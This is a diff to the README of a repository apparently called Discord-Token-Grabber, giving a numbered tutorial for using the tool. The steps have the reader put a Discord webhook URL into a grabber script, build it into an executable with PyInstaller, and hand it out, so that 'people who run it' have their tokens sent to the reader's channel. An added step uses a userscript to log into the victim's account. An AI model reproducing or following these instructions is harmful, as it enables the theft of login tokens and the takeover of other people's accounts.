plictisitor/Discord-Token-Grabber/README.md

 ### Tutorial:

-0 - download / clone this repo
+0 - Download / clone this repo

-1 - create a webhook for the channel you want (it will be used to log the tokens)
+1 - Create a webhook for the channel you want (it will be used to log the tokens)

-2 - copy the link into the `webhook_url` var in the **grabber.py** script
+2 - Copy the link into the `webhook_url` var in the **grabber.py** script

-3 - run build.bat (it will create an executable.
+3 - Run `build.bat` (it will create an executable.
 IT USES PYINSTALLER.
 MAKE SURE ITS INSTALLED)

-4 - in the /dist/ folder, you can find the exe. people who run it will have their token logged into your channel
+4 - In the /dist/ folder, you can find the exe. people who run it will have their token logged into your channel

+5 - Use the userscript `login_userscript.js` to enter his account

 ### Screenshots: